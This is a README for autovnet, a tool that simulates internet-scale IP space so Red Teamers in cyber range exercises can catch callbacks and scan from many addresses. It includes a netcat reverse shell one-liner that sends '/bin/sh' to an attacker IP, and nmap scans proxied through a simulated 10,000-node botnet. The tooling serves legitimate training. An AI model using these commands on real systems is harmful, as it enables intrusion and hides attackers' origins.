# autovnet

[TOC]

## Description

`autovnet` provides simple, performant, intuitive, internet-scale IP network simulation, empowering Cyber Range administrators and virtual Red Teamers to provide unprecedented realism in adversary emulation for "Red vs Blue" cyber exercises and competitions.

Red Teamers simply import the game configuration from a central _autovnet server_, and each Red Teamer can immediately, concurrently emulate arbitrarily many (e.g. _millions_) of unique actors with various levels of sophistication, each with separate Command and Control (C2) infrastructure and IP addresses.

This is [Red Team Force Multiplication (RTFM)](rtfm/README.md) - the ultimate goal for Red Team Cyber Wargame infrastructure - finally made possible at scale with `autovnet`.

![setup](img/term/client/setup.svg)

## Why `autovnet`?

Ever done a Red vs Blue Wargame, competition, or other hacking excercise?

`autovnet` solves the _'Red Team IP'_ problem, and provides the infrastructure and tooling necessary to achieve `Red Team Force Multiplication (RTFM)`.

To our knowledge, it is already _by far_ the best available solution in virtually every aspect, and more features are planned that will build on the current foundation to change the game again.

## `:80` / `:443` For Everyone!

* Every Red Teamer can catch a reverse shell to `RANDOM_IP:443` at the same time!

* Every Red Teamer can catch _as many reverse shells as they want_ to `RANDOM_IP:443` at the same time!
  - There are _millions_ -> _billions_ of available IPs; `autovnet` will randomly generate them from its IP pool

```bash
# Attacker
# Catch a callback on a random, 'public' IP address
#   from a pool of literally up to the entire IPv4 space (billions of IPs)

$ autovnet rtfm pwncat
[+] autovnet rtfm pwncat bumpy_travel
[+] bumpy_travel | 10.203.18.81:443 => 127.0.0.1:61869
[17:07:19] Welcome to pwncat 🐈! 
bound to 127.0.0.1:61869 ... 

# Each attacker can run N times concurrently, have N active shells on N different IPs 
```

```bash
# Target
# Throw shell to random, emphemeral IP
$ nc -e /bin/sh 10.203.18.81 443 
```

## Botnets for Everyone!

* Every Red Teamer can scan Blue Team 'from' (source IPs) a virtual botnet of literally up to the entire IPv4 space (billions of IPs)

### Attacker

```bash
# Attacker
# Scan 'from' a 10k node botnet
$ autovnet rtfm proxychains run -c 10000 -- nmap -sT -sV -sC -p80 BLUE_TEAM_IP

# There are also handy .proxy (generic) and .proxy-nmap (nmap-specific) helpers
# .proxy nmap -sT -sV -sC -p80 BLUE_TEAM_IP
# .proxy-nmap -sT -sV -sC -p80 BLUE_TEAM_IP
```

### Target

```bash
# Target
# Logs show connections from thousands of unique IP addresses:

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.137.203.202 - - [14/Oct/2021 16:50:18] "GET / HTTP/1.0" 200 -
10.137.210.167 - - [14/Oct/2021 16:50:18] code 501, message Unsupported method ('PROPFIND')
10.137.28.182 - - [14/Oct/2021 16:50:18] code 501, message Unsupported method ('OPTIONS')
10.137.113.124 - - [14/Oct/2021 16:50:18] code 404, message File not found
10.137.113.124 - - [14/Oct/2021 16:50:18] "GET /nmaplowercheck1634244618 HTTP/1.1" 404 -
10.137.210.167 - - [14/Oct/2021 16:50:18] "PROPFIND / HTTP/1.1" 501 -
10.137.48.254 - - [14/Oct/2021 16:50:18] "GET / HTTP/1.1" 200 -
10.137.172.184 - - [14/Oct/2021 16:50:18] code 501, message Unsupported method ('OPTIONS')
10.137.7.8 - - [14/Oct/2021 16:50:18] "GET / HTTP/1.0" 200 -
10.137.255.232 - - [14/Oct/2021 16:50:18] code 501, message Unsupported method ('POST')
10.137.255.232 - - [14/Oct/2021 16:50:18] "POST / HTTP/1.1" 501 -
10.137.24.19 - - [14/Oct/2021 16:50:18] code 404, message File not found
10.137.24.19 - - [14/Oct/2021 16:50:18] "GET /.git/HEAD HTTP/1.1" 404 -
10.137.28.182 - - [14/Oct/2021 16:50:18] "OPTIONS / HTTP/1.1" 501 -
10.137.154.63 - - [14/Oct/2021 16:50:18] code 501, message Unsupported method ('POST')
10.137.154.63 - - [14/Oct/2021 16:50:18] "POST /sdk HTTP/1.1" 501 -
10.137.238.27 - - [14/Oct/2021 16:50:18] code 404, message File not found
10.137.238.27 - - [14/Oct/2021 16:50:18] "GET /robots.txt HTTP/1.1" 404 -
...
```

> Wow, that's a lot of _IP addresses_

## Finally, a Solution that Sparks Joy

So, how can we possibly _implement_ Red Team Force Multiplication for a Cyber Range / Cyber excercise _without_ the power of money to obtain IP addresses?

That is: how can we just skip all the gross provisioning infrastructure stuff we don't actually care about and get an IP that is ready to use by our favorite hacking tools, like shown above?

Under the hood, the technical solution that makes `autovnet` possible is actually trivially simple!

We combine:

* The unlmited power of the Cyber Range network administrator, who acts as the Internet Service Provider (ISP) for the game network
* The pretty neato power of finding the giants with extra standing-room on their shoulders, instead of badly reinventing the wheel
    - [`Linux`](https://en.wikipedia.org/wiki/Linux_kernel) (the kernel) is good at packets
    - [`OpenSSH`](https://www.openssh.com/) is good at remote port forwarding (`GatewayPorts: clientspecified`)
    - [`SOCKS`](https://en.wikipedia.org/wiki/SOCKS) is good at proxying
    - [`dante`](https://www.inet.no/dante/) is a solid `SOCKS` server with that lets the dest IP of the `SOCKS` client control the source IP of the proxied traffic (`external.rotation: same-same`)

This approach gives us the ability to proxy traffic (primarily `TCP`) to and from existing tools, and gives the `autovnet` client control over what IP(s) are associated with the traffic.

* Essentially, all `autovnet` clients can roll a random IP address locally, and it is ready to use, because all IP addresses in the massive `autovnet` simulated network are real, valid IPs (see below for details)
* Then, the client can save that random IP, and specifically request it later - e.g. if the player wants to restart a particular C2 server and use the same IP they had before.
    - Note: If you are thinking: _But what if 2 unlucky players end up requesting the same IP?_, see the [Birthday Problem Mitigations](resources/troubleshooting.md#the-birthday-problem-ip-conflicts) that `autovnet` implements.

## But Wait, There's More: Multiplayer Collaboration!

`autovnet` already provides the best available Red Team infrastructure **for Blue Team** (i.e. super realistic), and is tailored to be effortless for Red Team to adopt and use.

But `autovnet` is _also_ the best available Red Team infrastructure **for Red Team**!

That is, `autovnet` is **also** a platform for Red Team collaboration, and enables unparalled support for **secure** real-time and asynchronous collaboration between players.


See [Collaboration](usage/collaboration/README.md) for the full list, but here are some highlights of the game-changing peer collaboration options you get _automatically_ with a default `autovnet` install!

* [Shared directories that work like local directories](usage/collaboration/fs.md)
* [Shared Markdown Notes / Collaborative Document Editing](usage/collaboration/hedgedoc.md)
* [(View-only) screen sharing](usage/collaboration/vnc.md)
* [`msfdb` (metasploit-framework database) sharing](usage/collaboration/msfdb.md)
* [`gitea` code sharing](usage/collaboration/gitea.md)
* [`focalboard` project management / kanban board sharing](usage/collaboration/focalboard.md)
* [Your favorite, aribtrary `TCP` services, but shared](usage/collaboration/svc.md)

## How is Something This Awesome Even Possible?

Great question!

The development process was simple:

1. Play in lots of wargames, and see how note-taking, file-sharing, etc. is managed for Red Team(s)
2. _Try not to cry; cry a lot_
3. Create the [Red Team Collaboration Infrastructure](usage/collaboration/README.md) that your current infrastructure wants to be when it grows up

Have **you** ever pasted `nmap` scan output into a Google Doc, uploaded multiple versions of a file in chat, etc.?
> Stop it. Get some help.

## Get Started

Ready to unleash the power of [Red Team Force Multiplication](rtfm/README.md)?

Start with the [Quick Start Guide](setup/README.md)!

